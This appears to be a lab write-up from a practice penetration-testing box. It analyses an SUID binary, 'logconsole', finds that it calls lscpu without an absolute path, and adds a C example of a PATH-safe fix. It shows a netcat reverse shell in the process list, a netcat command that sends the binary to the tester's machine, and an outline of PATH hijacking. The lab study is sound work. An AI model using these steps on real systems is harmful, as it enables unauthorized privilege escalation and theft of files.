logconsole
An unknown SUID binary has been identified. PEAS has found it as well.
The binary’s ownership is set to the tom user, who is a valid system user.
Debian-snmp@escape:/var/tmp$ /usr/bin/logconsole
/usr/bin/logconsole
/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report
Enter the option ==>
Executing the binary prompts for an option.
Option 1
Enter the option ==> 1
Linux escape 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Option 1 appears to execute uname -a.
Option 2
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.9 159672 9084 ? Ss 11:37 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 11:37 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 11:37 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? I< 11:37 0:00 [mm_percpu_wq]
root 7 0.0 0.0 0 0 ? S 11:37 0:00 [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 11:37 0:00 [rcu_sched]
root 9 0.0 0.0 0 0 ? I 11:37 0:00 [rcu_bh]
root 10 0.0 0.0 0 0 ? S 11:37 0:00 [migration/0]
root 11 0.0 0.0 0 0 ? S 11:37 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 11:37 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 11:37 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? I< 11:37 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 11:37 0:00 [rcu_tasks_kthr
root 16 0.0 0.0 0 0 ? S 11:37 0:00 [kauditd]
root 17 0.0 0.0 0 0 ? S 11:37 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 11:37 0:00 [oom_reaper]
root 19 0.0 0.0 0 0 ? I< 11:37 0:00 [writeback]
root 20 0.0 0.0 0 0 ? S 11:37 0:00 [kcompactd0]
root 21 0.0 0.0 0 0 ? SN 11:37 0:00 [ksmd]
root 22 0.0 0.0 0 0 ? SN 11:37 0:00 [khugepaged]
root 23 0.0 0.0 0 0 ? I< 11:37 0:00 [crypto]
root 24 0.0 0.0 0 0 ? I< 11:37 0:00 [kintegrityd]
root 25 0.0 0.0 0 0 ? I< 11:37 0:00 [kblockd]
root 26 0.0 0.0 0 0 ? I< 11:37 0:00 [ata_sff]
root 27 0.0 0.0 0 0 ? I< 11:37 0:00 [md]
root 28 0.0 0.0 0 0 ? I< 11:37 0:00 [edac-poller]
root 29 0.0 0.0 0 0 ? I< 11:37 0:00 [devfreq_wq]
root 30 0.0 0.0 0 0 ? I< 11:37 0:00 [watchdogd]
root 31 0.0 0.0 0 0 ? I 11:37 0:00 [kworker/u2:1]
root 32 0.0 0.0 0 0 ? I 11:37 0:00 [kworker/0:1]
root 34 0.0 0.0 0 0 ? S 11:37 0:00 [kswapd0]
root 35 0.0 0.0 0 0 ? I< 11:37 0:00 [kworker/u3:0]
root 36 0.0 0.0 0 0 ? S 11:37 0:00 [ecryptfs-kthre
root 78 0.0 0.0 0 0 ? I< 11:37 0:00 [kthrotld]
root 79 0.0 0.0 0 0 ? I< 11:37 0:00 [acpi_thermal_p
root 80 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_0]
root 81 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_0]
root 82 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_1]
root 83 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_1]
root 89 0.0 0.0 0 0 ? I< 11:37 0:00 [ipv6_addrconf]
root 99 0.0 0.0 0 0 ? I< 11:37 0:00 [kstrp]
root 117 0.0 0.0 0 0 ? I< 11:37 0:00 [charger_manage
root 175 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_2]
root 176 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_3]
root 177 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_2]
root 178 0.0 0.0 0 0 ? I< 11:37 0:00 [vmw_pvscsi_wq_
root 179 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_3]
root 180 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_4]
root 181 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_4]
root 182 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_5]
root 183 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_5]
root 184 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_6]
root 186 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_6]
root 192 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_7]
root 199 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_7]
root 205 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_8]
root 207 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_8]
root 209 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_9]
root 212 0.0 0.0 0 0 ? I< 11:37 0:00 [ttm_swap]
root 213 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_9]
root 215 0.0 0.0 0 0 ? S 11:37 0:00 [irq/16-vmwgfx]
root 216 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_10]
root 219 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_10]
root 222 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_11]
root 224 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_11]
root 226 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_12]
root 227 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_12]
root 231 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_13]
root 232 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_13]
root 234 0.0 0.0 0 0 ? I< 11:37 0:00 [kworker/0:1H]
root 235 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_14]
root 237 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_14]
root 239 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_15]
root 240 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_15]
root 242 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_16]
root 243 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_16]
root 245 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_17]
root 247 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_17]
root 248 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_18]
root 250 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_18]
root 251 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_19]
root 253 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_19]
root 255 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_20]
root 256 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_20]
root 258 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_21]
root 260 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_21]
root 262 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_22]
root 264 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_22]
root 266 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_23]
root 268 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_23]
root 269 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_24]
root 270 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_24]
root 271 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_25]
root 272 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_25]
root 273 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_26]
root 274 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_26]
root 275 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_27]
root 276 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_27]
root 277 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_28]
root 278 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_28]
root 279 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_29]
root 280 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_29]
root 281 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_30]
root 282 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_30]
root 283 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_31]
root 284 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_31]
root 285 0.0 0.0 0 0 ? S 11:37 0:00 [scsi_eh_32]
root 286 0.0 0.0 0 0 ? I< 11:37 0:00 [scsi_tmf_32]
root 385 0.0 0.0 0 0 ? I< 11:37 0:00 [raid5wq]
root 441 0.0 0.0 0 0 ? S 11:37 0:00 [jbd2/sda1-8]
root 442 0.0 0.0 0 0 ? I< 11:37 0:00 [ext4-rsv-conve
root 502 0.0 1.0 78456 10544 ? S<s 11:37 0:00 /lib/systemd/sy
root 516 0.0 0.0 0 0 ? I< 11:37 0:00 [iscsi_eh]
root 518 0.1 0.7 48416 7288 ? Ss 11:37 0:03 /lib/systemd/sy
root 524 0.0 0.0 0 0 ? I< 11:37 0:00 [ib-comp-wq]
root 525 0.0 0.0 0 0 ? I< 11:37 0:00 [ib-comp-unb-wq
root 526 0.0 0.0 0 0 ? I< 11:37 0:00 [ib_mcast]
root 527 0.0 0.0 0 0 ? I< 11:37 0:00 [ib_nl_sa_wq]
root 528 0.0 0.1 97716 1716 ? Ss 11:37 0:00 /sbin/lvmetad -
root 539 0.0 0.0 0 0 ? I< 11:37 0:00 [rdma_cm]
systemd+ 691 0.0 0.3 141964 3300 ? Ssl 11:37 0:00 /lib/systemd/sy
systemd+ 694 0.0 0.5 70672 5360 ? Ss 11:37 0:00 /lib/systemd/sy
root 702 0.0 0.9 91164 9988 ? Ss 11:37 0:00 /usr/bin/VGAuth
root 703 0.0 0.7 227020 7500 ? S<sl 11:37 0:01 /usr/bin/vmtool
root 715 0.0 0.1 161084 1680 ? Ssl 11:37 0:00 /usr/bin/lxcfs
message+ 717 0.0 0.4 50052 4544 ? Ss 11:37 0:00 /usr/bin/dbus-d
root 785 0.0 1.7 170400 17220 ? Ssl 11:37 0:00 /usr/bin/python
root 787 0.0 0.6 287552 6844 ? Ssl 11:37 0:00 /usr/lib/accoun
root 788 0.0 0.5 62168 5724 ? Ss 11:37 0:00 /lib/systemd/sy
daemon 789 0.0 0.2 28340 2484 ? Ss 11:37 0:00 /usr/sbin/atd -
syslog 790 0.0 0.4 263044 4900 ? Ssl 11:37 0:00 /usr/sbin/rsysl
root 802 0.0 0.3 31328 3108 ? Ss 11:37 0:00 /usr/sbin/cron
Debian-+ 804 0.0 1.1 65684 11644 ? Ss 11:37 0:00 /usr/sbin/snmpd
root 826 0.0 4.1 674684 41512 ? Ssl 11:37 0:00 /usr/bin/contai
root 837 0.0 1.9 187128 20104 ? Ssl 11:37 0:00 /usr/bin/python
root 876 0.0 0.6 288888 6488 ? Ssl 11:37 0:00 /usr/lib/policy
root 1176 0.0 8.3 839324 84100 ? Ssl 11:39 0:00 /usr/bin/docker
root 1189 0.0 0.5 72308 5768 ? Ss 11:39 0:00 /usr/sbin/sshd
root 1236 0.0 0.1 16188 1996 tty1 Ss+ 11:39 0:00 /sbin/agetty -o
root 1290 0.0 1.6 329200 17072 ? Ss 11:39 0:00 /usr/sbin/apach
www-data 1301 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1302 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1303 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1304 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
www-data 1305 0.0 0.8 333600 8988 ? S 11:39 0:00 /usr/sbin/apach
root 1535 0.0 0.3 478540 3048 ? Sl 11:39 0:00 /usr/bin/docker
root 1542 0.0 0.5 9364 5336 ? Sl 11:39 0:00 containerd-shim
root 1559 0.0 2.3 82892 24120 ? Ss 11:39 0:00 apache2 -DFOREG
www-data 1668 0.0 0.6 82916 7016 ? S 11:39 0:00 apache2 -DFOREG
www-data 1669 0.0 0.6 82916 7016 ? S 11:39 0:00 apache2 -DFOREG
www-data 1670 0.0 0.6 82916 7016 ? S 11:39 0:00 apache2 -DFOREG
www-data 1671 17.4 1.0 83028 10912 ? R 11:39 8:13 apache2 -DFOREG
www-data 1672 0.0 1.1 83208 11508 ? S 11:39 0:00 apache2 -DFOREG
systemd+ 2127 0.0 0.5 72028 5172 ? Ss 12:18 0:00 /lib/systemd/sy
root 2142 0.0 0.0 0 0 ? I 12:18 0:00 [kworker/u2:3]
root 2195 0.0 0.0 0 0 ? I 12:18 0:00 [kworker/0:0]
www-data 2301 0.0 0.6 82916 7016 ? S 12:18 0:00 apache2 -DFOREG
www-data 2302 0.0 0.6 82916 7016 ? S 12:18 0:00 apache2 -DFOREG
www-data 2303 0.0 0.0 2388 692 ? S 12:18 0:00 sh -c bash
www-data 2304 0.0 0.2 3736 2748 ? S 12:18 0:00 bash
www-data 2308 0.0 0.1 2592 1792 ? S 12:18 0:00 script /dev/nul
www-data 2309 0.0 0.0 2388 696 pts/0 Ss 12:18 0:00 sh -c bash
www-data 2310 0.0 0.3 3868 3180 pts/0 S+ 12:18 0:00 bash
Debian-+ 2317 0.0 0.0 4636 820 ? S 12:18 0:00 sh -c /bin/sh /
Debian-+ 2318 0.0 0.0 4636 860 ? S 12:18 0:00 /bin/sh /tmp/sh
Debian-+ 2320 0.0 0.2 15720 2164 ? S 12:18 0:00 nc 192.168.45.1
Debian-+ 2321 0.0 0.0 4636 780 ? S 12:18 0:00 /bin/sh
Debian-+ 2324 0.0 0.2 22252 2600 ? S 12:18 0:00 script /dev/nul
Debian-+ 2325 0.0 0.0 4636 812 pts/0 Ss 12:18 0:00 sh -c bash
Debian-+ 2326 0.0 0.3 21480 4012 pts/0 S 12:18 0:00 bash
Debian-+ 2402 0.0 0.0 4524 720 pts/0 S+ 12:25 0:00 /usr/bin/logcon
tom 2406 0.0 0.0 4636 824 pts/0 S+ 12:26 0:00 sh -c /bin/ps a
tom 2407 0.0 0.3 39672 3576 pts/0 R+ 12:26 0:00 /bin/ps aux
Option 2 shows the output of the ps command.
Option 3
Enter the option ==> 3
3
reboot system boot 4.15.0-124-gener Sat Mar 1 04:43 still running
reboot system boot 4.15.0-124-gener Fri Aug 2 20:14 still running
wtmp begins Fri Aug 2 20:14:35 2024
Option 3 shows the output of the last reboot command.
Option 4
Enter the option ==> 4
4
12:28:06 up 51 min, 0 users, load average: 1.00, 0.88, 0.49
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Option 4 shows the output of the w command.
Option 5
Enter the option ==> 5
5
default via 192.168.122.254 dev ens192 proto static
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
192.168.122.0/24 dev ens192 proto kernel scope link src 192.168.122.113
This appears to be the output of the ip route command.
Option 6
Enter the option ==> 6
6
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 1
On-line CPU(s) list: 0
Thread(s) per core: 1
Core(s) per socket: 1
Socket(s): 1
NUMA node(s): 1
Vendor ID: AuthenticAMD
CPU family: 25
Model: 1
Model name: AMD EPYC 7413 24-Core Processor
Stepping: 1
CPU MHz: 2649.999
BogoMIPS: 5299.99
Hypervisor vendor: VMware
Virtualization type: full
L1d cache: 32K
L1i cache: 32K
L2 cache: 512K
L3 cache: 131072K
NUMA node0 CPU(s): 0
Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw invpcid_single ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves clzero arat umip pku ospke vaes vpclmulqdq rdpid overflow_recov succor
This is from the lscpu command.
Option 99
Enter the option ==> 99
99
Segmentation fault (core dumped)
Option 99 is supposed to generate a report but crashed with a segfault instead.
Analysis
Debian-snmp@escape:/var/tmp$ nc -nv 192.168.45.153 2222 < /usr/bin/logconsole
Connection to 192.168.45.153 2222 port [tcp/*] succeeded!
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ nnc 2222 > logconsole
listening on [any] 2222 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 38040
Transferring the binary to Kali for further analysis
strings
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ strings logconsole
/lib64/ld-linux-x86-64.so.2
mgUa
fopen
__isoc99_scanf
setreuid
putchar
stdin
popen
printf
fgets
stdout
fputs
fclose
system
getuid
fwrite
geteuid
__cxa_finalize
setvbuf
__libc_start_main
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/home/tom/logconsole.txt
*********************************************************************
/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/
[1;31m
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report
[01;33m
Enter the option ==>
/bin/uname -a
/bin/ps aux
/usr/bin/last
/usr/bin/w
/sbin/ip route | column -t
lscpu
Invalid Option!!!!!
Report is Ready!!!
;*3$"
GCC: (Debian 10.2.0-7) 10.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
syslog.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
stdout@@GLIBC_2.2.5
stdin@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
getuid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
fputs@@GLIBC_2.2.5
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
fgets@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
setreuid@@GLIBC_2.2.5
__bss_start
main
setvbuf@@GLIBC_2.2.5
get_output
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
__isoc99_scanf@@GLIBC_2.7
fwrite@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
Checking the strings within the logconsole binary reveals those commands.
While the majority of those commands are provided with absolute paths, lscpu doesn’t have an absolute path set.
This would mean that I can hijack this binary by altering the PATH variable.
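For the remediation side of this finding, here is one way a privileged helper can run its fixed commands so that the caller's PATH has no effect. This is an added example, not the logconsole source, which the page does not show. The names run_pinned and SAFE_ENV are hypothetical and the /usr/bin/lscpu location is an assumption.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Environment handed to every child: nothing is inherited from the caller,
 * so a caller-controlled PATH never reaches the executed program. */
static char *const SAFE_ENV[] = {
    "PATH=/usr/sbin:/usr/bin:/sbin:/bin", "LC_ALL=C", NULL
};

/* Run argv[0] with execve(): no shell and no PATH search.
 * Returns the child's exit status, or -1 if the request is refused or fails. */
int run_pinned(char *const argv[])
{
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/')
        return -1;                  /* bare names such as "lscpu" are refused */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, SAFE_ENV);
        _exit(127);                 /* exec failed, e.g. the path does not exist */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Assumed install location; confirm it on the target distribution. */
    char *const cpu_info[] = { "/usr/bin/lscpu", NULL };
    char *const bare[]     = { "lscpu", NULL };

    printf("bare name   -> %d\n", run_pinned(bare));     /* refused before fork */
    printf("pinned path -> %d\n", run_pinned(cpu_info)); /* lscpu's exit status */
    return 0;
}
```

Because system() and popen() hand the string to /bin/sh, which searches PATH for any bare command name, replacing them with a direct execve() of an absolute path removes the lookup entirely.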
Moving on to the Lateral Movement phase